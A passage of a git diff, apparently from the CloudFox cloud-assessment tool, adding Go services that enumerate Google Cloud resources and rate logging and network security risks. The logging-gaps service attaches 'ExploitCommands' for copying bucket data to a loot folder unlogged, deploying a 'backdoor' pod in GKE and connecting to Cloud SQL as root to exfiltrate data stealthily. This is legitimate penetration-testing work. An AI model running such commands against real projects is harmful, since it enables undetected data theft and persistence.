// Weak TLS version + if policy.MinTLSVersion == "TLS_1_0" { + reasons = append(reasons, "Allows TLS 1.0 (deprecated)") + score += 3 + } else if policy.MinTLSVersion == "TLS_1_1" { + reasons = append(reasons, "Allows TLS 1.1 (deprecated)") + score += 2 + } + + // COMPATIBLE profile allows weak ciphers + if policy.Profile == "COMPATIBLE" { + reasons = append(reasons, "COMPATIBLE profile allows weak ciphers") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *LoadBalancerService) analyzeBackendServiceRisk(backend BackendServiceInfo) (string, []string) { + var reasons []string + score := 0 + + // No Cloud Armor policy + if backend.SecurityPolicy == "" { + reasons = append(reasons, "No Cloud Armor security policy attached") + score += 1 + } + + // No health check + if backend.HealthCheck == "" { + reasons = append(reasons, "No health check configured") + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/loggingGapsService/loggingGapsService.go b/gcp/services/loggingGapsService/loggingGapsService.go new file mode 100644 index 00000000..ba16c85f --- /dev/null +++ b/gcp/services/loggingGapsService/loggingGapsService.go @@ -0,0 +1,472 @@ +package logginggapsservice + +import ( + "context" + "fmt" + "strings" + + logging "cloud.google.com/go/logging/apiv2" + "cloud.google.com/go/logging/apiv2/loggingpb" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" + "google.golang.org/api/iterator" +) + +type LoggingGapsService struct{} + +func New() *LoggingGapsService { + return &LoggingGapsService{} +} + +// LoggingGap represents a resource with missing or incomplete logging +type LoggingGap struct { + ResourceType string // compute, cloudsql, gke, bucket, project + ResourceName string + ProjectID string + Location string + LoggingStatus string // disabled, partial, misconfigured + MissingLogs []string // Which logs are missing + StealthValue string // HIGH, MEDIUM, LOW - value for attacker stealth + Recommendations []string + ExploitCommands []string // Commands to exploit the gap +} + +// AuditLogConfig represents the audit logging configuration for a project +type AuditLogConfig struct { + ProjectID string + DataAccessEnabled bool + AdminActivityEnabled bool // Always on, but good to verify + SystemEventEnabled bool + PolicyDeniedEnabled bool + ExemptedMembers []string + ExemptedServices []string +} + +// EnumerateLoggingGaps finds resources with logging gaps +func (s *LoggingGapsService) EnumerateLoggingGaps(projectID string) ([]LoggingGap, *AuditLogConfig, error) { + var gaps []LoggingGap + + // Get project-level audit log config + auditConfig, err := s.getProjectAuditConfig(projectID) + if err != nil { + auditConfig = &AuditLogConfig{ProjectID: projectID} + } + + // Check various resource types for logging gaps + if bucketGaps, err := s.checkBucketLogging(projectID); err == nil { + gaps = append(gaps, bucketGaps...) + } + + if computeGaps, err := s.checkComputeLogging(projectID); err == nil { + gaps = append(gaps, computeGaps...) + } + + if gkeGaps, err := s.checkGKELogging(projectID); err == nil { + gaps = append(gaps, gkeGaps...) + } + + if sqlGaps, err := s.checkCloudSQLLogging(projectID); err == nil { + gaps = append(gaps, sqlGaps...) + } + + // Check for log sinks that might be misconfigured + if sinkGaps, err := s.checkLogSinks(projectID); err == nil { + gaps = append(gaps, sinkGaps...) + } + + return gaps, auditConfig, nil +} + +func (s *LoggingGapsService) getProjectAuditConfig(projectID string) (*AuditLogConfig, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + config := &AuditLogConfig{ + ProjectID: projectID, + AdminActivityEnabled: true, // Always enabled + } + + // List log sinks to understand logging configuration + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Check if there's a sink for audit logs + if strings.Contains(sink.Filter, "protoPayload.@type") { + config.DataAccessEnabled = true + } + } + + return config, nil +} + +func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := storage.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if bucket logging is enabled + if bucket.Logging == nil || bucket.Logging.LogBucket == "" { + missingLogs = append(missingLogs, "Access logs disabled") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Enable access logging for the bucket", + fmt.Sprintf("gsutil logging set on -b gs://%s gs://%s", bucket.Name, bucket.Name), + }, + ExploitCommands: []string{ + fmt.Sprintf("# Access without logs - stealth data exfil:\ngsutil cp gs://%s/* ./loot/ 2>/dev/null", bucket.Name), + fmt.Sprintf("# List contents without being logged:\ngsutil ls -r gs://%s/", bucket.Name), + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + // Check VPC flow logs on subnets + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnets := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, subnet := range subnets.Subnetworks { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if VPC flow logs are enabled + if subnet.LogConfig == nil || !subnet.LogConfig.Enable { + missingLogs = append(missingLogs, "VPC Flow Logs disabled") + loggingStatus = "disabled" + } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { + missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") + loggingStatus = "partial" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "subnet", + ResourceName: subnet.Name, + ProjectID: projectID, + Location: regionName, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable VPC Flow Logs on subnet", + "Set aggregation interval to 5 seconds for maximum visibility", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Network activity on this subnet won't be logged"), + fmt.Sprintf("# Lateral movement within VPC: %s", subnet.IpCidrRange), + }, + } + gaps = append(gaps, gap) + } + } + } + return nil + }) + + return gaps, err +} + +func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := container.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check logging service + if cluster.LoggingService == "" || cluster.LoggingService == "none" { + missingLogs = append(missingLogs, "Cluster logging disabled") + loggingStatus = "disabled" + } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { + missingLogs = append(missingLogs, "Not using Cloud Logging") + loggingStatus = "partial" + } + + // Check monitoring service + if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { + missingLogs = append(missingLogs, "Cluster monitoring disabled") + } + + // Check for specific logging components + if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { + components := cluster.LoggingConfig.ComponentConfig.EnableComponents + hasSystemComponents := false + hasWorkloads := false + for _, comp := range components { + if comp == "SYSTEM_COMPONENTS" { + hasSystemComponents = true + } + if comp == "WORKLOADS" { + hasWorkloads = true + } + } + if !hasSystemComponents { + missingLogs = append(missingLogs, "System component logs disabled") + } + if !hasWorkloads { + missingLogs = append(missingLogs, "Workload logs disabled") + } + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "gke", + ResourceName: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "CRITICAL", + Recommendations: []string{ + "Enable Cloud Logging for GKE cluster", + "Enable SYSTEM_COMPONENTS and WORKLOADS logging", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Get credentials for cluster with limited logging:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), + "# Run commands without workload logging:\nkubectl exec -it -- /bin/sh", + "# Deploy backdoor pods without detection:\nkubectl run backdoor --image=alpine -- sleep infinity", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check database flags for logging + if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { + hasQueryLogging := false + hasConnectionLogging := false + + for _, flag := range instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == "on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable query and connection logging", + "For MySQL: SET GLOBAL general_log = 'ON'", + "For PostgreSQL: ALTER SYSTEM SET log_statement = 'all'", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Connect without query logging:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), + "# Execute queries without being logged", + "# Exfiltrate data stealthily", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkLogSinks(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + sinkCount := 0 + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + sinkCount++ + + // Check for disabled sinks + if sink.Disabled { + gap := LoggingGap{ + ResourceType: "log-sink", + ResourceName: sink.Name, + ProjectID: projectID, + Location: "global", + LoggingStatus: "disabled", + MissingLogs: []string{"Sink is disabled"}, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable the log sink or remove if not needed", + }, + ExploitCommands: []string{ + "# Logs matching this sink filter are not being exported", + fmt.Sprintf("# Sink filter: %s", sink.Filter), + }, + } + gaps = append(gaps, gap) + } + + // Check for overly permissive exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + gap := LoggingGap{ + ResourceType: "log-exclusion", + ResourceName: fmt.Sprintf("%s/%s", sink.Name, exclusion.Name), + ProjectID: projectID, + Location: "global", + LoggingStatus: "exclusion-active", + MissingLogs: []string{fmt.Sprintf("Exclusion filter: %s", exclusion.Filter)}, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Review exclusion filter for security implications", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Logs matching this filter are excluded: %s", exclusion.Filter), + }, + } + gaps = append(gaps, gap) + } + } + } + + // Check if there are no sinks at all + if sinkCount == 0 { + gap := LoggingGap{ + ResourceType: "project", + ResourceName: projectID, + ProjectID: projectID, + Location: "global", + LoggingStatus: "no-export", + MissingLogs: []string{"No log sinks configured - logs only in Cloud Logging"}, + StealthValue: "LOW", + Recommendations: []string{ + "Configure log sinks to export logs to external storage", + "Ensures logs are preserved even if project is compromised", + }, + ExploitCommands: []string{ + "# Logs can be deleted if project is compromised", + "# Consider exporting to separate project or external SIEM", + }, + } + gaps = append(gaps, gap) + } + + return gaps, nil +} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go new file mode 100644 index 00000000..b96a3a3a --- /dev/null +++ b/gcp/services/loggingService/loggingService.go @@ -0,0 +1,255 @@ +package loggingservice + +import ( + "context" + "fmt" + "strings" + + logging "google.golang.org/api/logging/v2" +) + +type LoggingService struct{} + +func New() *LoggingService { + return &LoggingService{} +} + +// SinkInfo holds Cloud Logging sink details with security-relevant information +type SinkInfo struct { + Name string + ProjectID string + Description string + CreateTime string + UpdateTime string + + // Destination configuration + Destination string // Full destination resource name + DestinationType string // bigquery, storage, pubsub, logging + DestinationBucket string // For storage destinations + DestinationDataset string // For BigQuery destinations + DestinationTopic string // For Pub/Sub destinations + DestinationProject string // Project containing the destination + + // Filter + Filter string + Disabled bool + + // Export identity + WriterIdentity string // Service account that writes to destination + + // Inclusion/exclusion + ExclusionFilters []string + + // Cross-project indicator + IsCrossProject bool +} + +// MetricInfo holds log-based metric details +type MetricInfo struct { + Name string + ProjectID string + Description string + Filter string + CreateTime string + UpdateTime string + + // Metric configuration + MetricKind string // DELTA, GAUGE, CUMULATIVE + ValueType string // INT64, DOUBLE, DISTRIBUTION + + // Labels extracted from logs + LabelCount int +} + +// Sinks retrieves all logging sinks in a project +func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Logging service: %v", err) + } + + var sinks []SinkInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Sinks.List(parent) + err = call.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + info := parseSinkInfo(sink, projectID) + sinks = append(sinks, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list sinks: %v", err) + } + + return sinks, nil +} + +// Metrics retrieves all log-based metrics in a project +func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Logging service: %v", err) + } + + var metrics []MetricInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Metrics.List(parent) + err = call.Pages(ctx, func(page *logging.ListLogMetricsResponse) error { + for _, metric := range page.Metrics { + info := parseMetricInfo(metric, projectID) + metrics = append(metrics, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list metrics: %v", err) + } + + return metrics, nil +} + +// parseSinkInfo extracts relevant information from a logging sink +func parseSinkInfo(sink *logging.LogSink, projectID string) SinkInfo { + info := SinkInfo{ + Name: sink.Name, + ProjectID: projectID, + Description: sink.Description, + CreateTime: sink.CreateTime, + UpdateTime: sink.UpdateTime, + Destination: sink.Destination, + Filter: sink.Filter, + Disabled: sink.Disabled, + WriterIdentity: sink.WriterIdentity, + } + + // Parse destination type and details + info.DestinationType, info.DestinationProject = parseDestination(sink.Destination) + + switch info.DestinationType { + case "storage": + info.DestinationBucket = extractBucketName(sink.Destination) + case "bigquery": + info.DestinationDataset = extractDatasetName(sink.Destination) + case "pubsub": + info.DestinationTopic = extractTopicName(sink.Destination) + } + + // Check if cross-project + if info.DestinationProject != "" && info.DestinationProject != projectID { + info.IsCrossProject = true + } + + // Parse exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + info.ExclusionFilters = append(info.ExclusionFilters, exclusion.Filter) + } + } + + return info +} + +// parseMetricInfo extracts relevant information from a log-based metric +func parseMetricInfo(metric *logging.LogMetric, projectID string) MetricInfo { + info := MetricInfo{ + Name: metric.Name, + ProjectID: projectID, + Description: metric.Description, + Filter: metric.Filter, + CreateTime: metric.CreateTime, + UpdateTime: metric.UpdateTime, + } + + if metric.MetricDescriptor != nil { + info.MetricKind = metric.MetricDescriptor.MetricKind + info.ValueType = metric.MetricDescriptor.ValueType + info.LabelCount = len(metric.MetricDescriptor.Labels) + } + + return info +} + +// parseDestination parses the destination resource name +func parseDestination(destination string) (destType string, project string) { + switch { + case strings.HasPrefix(destination, "storage.googleapis.com/"): + destType = "storage" + // Format: storage.googleapis.com/bucket-name + parts := strings.Split(destination, "/") + if len(parts) >= 2 { + // Bucket name might encode project, but typically doesn't + project = "" + } + case strings.HasPrefix(destination, "bigquery.googleapis.com/"): + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "pubsub.googleapis.com/"): + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "logging.googleapis.com/"): + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + default: + destType = "unknown" + } + return +} + +// extractBucketName extracts bucket name from storage destination +func extractBucketName(destination string) string { + // Format: storage.googleapis.com/bucket-name + parts := strings.SplitN(destination, "/", 2) + if len(parts) >= 2 { + return parts[1] + } + return destination +} + +// extractDatasetName extracts dataset name from BigQuery destination +func extractDatasetName(destination string) string { + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/datasets/"); idx >= 0 { + remainder := destination[idx+len("/datasets/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + return remainder[:slashIdx] + } + return remainder + } + return "" +} + +// extractTopicName extracts topic name from Pub/Sub destination +func extractTopicName(destination string) string { + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/topics/"); idx >= 0 { + return destination[idx+len("/topics/"):] + } + return "" +} diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go new file mode 100644 index 00000000..1e7eaf7b --- /dev/null +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -0,0 +1,140 @@ +package memorystoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + redis "google.golang.org/api/redis/v1" +) + +type MemorystoreService struct { + session *gcpinternal.SafeSession +} + +func New() *MemorystoreService { + return &MemorystoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { + return &MemorystoreService{session: session} +} + +// RedisInstanceInfo represents a Redis instance +type RedisInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListRedisInstances retrieves all Redis instances in a project +func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { + ctx := context.Background() + var service *redis.Service + var err error + + if s.session != nil { + service, err = redis.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = redis.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Redis service: %v", err) + } + + var instances []RedisInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *redis.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseRedisInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list Redis instances: %v", err) + } + + return instances, nil +} + +func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { + info := RedisInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: instance.LocationId, + DisplayName: instance.DisplayName, + Tier: instance.Tier, + MemorySizeGB: instance.MemorySizeGb, + RedisVersion: instance.RedisVersion, + Host: instance.Host, + Port: instance.Port, + State: instance.State, + AuthEnabled: instance.AuthEnabled, + TransitEncryption: instance.TransitEncryptionMode, + ConnectMode: instance.ConnectMode, + AuthorizedNetwork: instance.AuthorizedNetwork, + ReservedIPRange: instance.ReservedIpRange, + CreateTime: instance.CreateTime, + RiskReasons: []string{}, + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeRedisRisk(info) + return info +} + +func (s *MemorystoreService) analyzeRedisRisk(instance RedisInstanceInfo) (string, []string) { + var reasons []string + score := 0 + + if !instance.AuthEnabled { + reasons = append(reasons, "Authentication not enabled") + score += 3 + } + + if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { + reasons = append(reasons, "Transit encryption disabled") + score += 2 + } + + if instance.Tier == "BASIC" { + reasons = append(reasons, "Basic tier (no HA)") + score += 1 + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go new file mode 100644 index 00000000..36bea690 --- /dev/null +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -0,0 +1,373 @@ +package networkendpointsservice + +import ( + "context" + "fmt" + "strings" + + compute "google.golang.org/api/compute/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" +) + +type NetworkEndpointsService struct{} + +func New() *NetworkEndpointsService { + return &NetworkEndpointsService{} +} + +// PrivateServiceConnectEndpoint represents a PSC endpoint +type PrivateServiceConnectEndpoint struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string `json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` +} + +// PrivateConnection represents a private service connection (e.g., for Cloud SQL) +type PrivateConnection struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + AccessibleServices []string `json:"accessibleServices"` +} + +// ServiceAttachment represents a PSC service attachment (producer side) +type ServiceAttachment struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules +func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var endpoints []PrivateServiceConnectEndpoint + + // List forwarding rules across all regions + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, rule := range scopedList.ForwardingRules { + // Check if this is a PSC endpoint + if rule.Target == "" { + continue + } + + // PSC endpoints target service attachments or Google APIs + isPSC := false + targetType := "" + + if strings.Contains(rule.Target, "serviceAttachments") { + isPSC = true + targetType = "service-attachment" + } else if strings.Contains(rule.Target, "all-apis") || + strings.Contains(rule.Target, "vpc-sc") || + rule.Target == "all-apis" { + isPSC = true + targetType = "google-apis" + } + + if !isPSC { + continue + } + + endpoint := PrivateServiceConnectEndpoint{ + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, + RiskReasons: []string{}, + ExploitCommands: []string{}, + } + + // Check connection state (for PSC endpoints to service attachments) + if rule.PscConnectionStatus != "" { + endpoint.ConnectionState = rule.PscConnectionStatus + } else { + endpoint.ConnectionState = "ACTIVE" + } + + endpoint.RiskLevel, endpoint.RiskReasons = s.analyzePSCRisk(endpoint) + endpoint.ExploitCommands = s.generatePSCExploitCommands(endpoint) + + endpoints = append(endpoints, endpoint) + } + } + return nil + }) + + return endpoints, err +} + +// GetPrivateConnections retrieves private service connections +func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]PrivateConnection, error) { + ctx := context.Background() + service, err := servicenetworking.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create service networking service: %v", err) + } + + var connections []PrivateConnection + + // List connections for the project's networks + computeService, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + // Get all networks + networks, err := computeService.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, network := range networks.Items { + networkName := fmt.Sprintf("projects/%s/global/networks/%s", projectID, network.Name) + + // List connections for this network + resp, err := service.Services.Connections.List("services/servicenetworking.googleapis.com"). + Network(networkName).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no connections + } + + for _, conn := range resp.Connections { + connection := PrivateConnection{ + Name: conn.Peering, + ProjectID: projectID, + Network: network.Name, + Service: conn.Service, + ReservedRanges: conn.ReservedPeeringRanges, + PeeringName: conn.Peering, + RiskReasons: []string{}, + } + + // Determine accessible services based on the connection + connection.AccessibleServices = s.determineAccessibleServices(conn.Service) + + connection.RiskLevel, connection.RiskReasons = s.analyzeConnectionRisk(connection) + + connections = append(connections, connection) + } + } + + return connections, nil +} + +// GetServiceAttachments retrieves PSC service attachments (producer side) +func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %v", err) + } + + var attachments []ServiceAttachment + + req := service.ServiceAttachments.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, attachment := range scopedList.ServiceAttachments { + sa := ServiceAttachment{ + Name: attachment.Name, + ProjectID: projectID, + Region: regionName, + TargetService: extractName(attachment.TargetService), + ConnectionPreference: attachment.ConnectionPreference, + EnableProxyProtocol: attachment.EnableProxyProtocol, + RiskReasons: []string{}, + } + + // Extract NAT subnets + for _, subnet := range attachment.NatSubnets { + sa.NatSubnets = append(sa.NatSubnets, extractName(subnet)) + } + + // Count connected endpoints + if attachment.ConnectedEndpoints != nil { + sa.ConnectedEndpoints = len(attachment.ConnectedEndpoints) + } + + // Extract consumer accept/reject lists + for _, accept := range attachment.ConsumerAcceptLists { + sa.ConsumerAcceptLists = append(sa.ConsumerAcceptLists, accept.ProjectIdOrNum) + } + for _, reject := range attachment.ConsumerRejectLists { + sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) + } + + sa.RiskLevel, sa.RiskReasons = s.analyzeAttachmentRisk(sa) + + attachments = append(attachments, sa) + } + } + return nil + }) + + return attachments, err +} + +func (s *NetworkEndpointsService) analyzePSCRisk(endpoint PrivateServiceConnectEndpoint) (string, []string) { + var reasons []string + score := 0 + + if endpoint.TargetType == "google-apis" { + reasons = append(reasons, "PSC endpoint to Google APIs - internal access to GCP services") + score += 1 + } + + if endpoint.TargetType == "service-attachment" { + reasons = append(reasons, "PSC endpoint to service attachment - access to producer service") + score += 1 + } + + if endpoint.ConnectionState == "ACCEPTED" || endpoint.ConnectionState == "ACTIVE" { + reasons = append(reasons, "Connection is active") + score += 1 + } + + if score >= 2 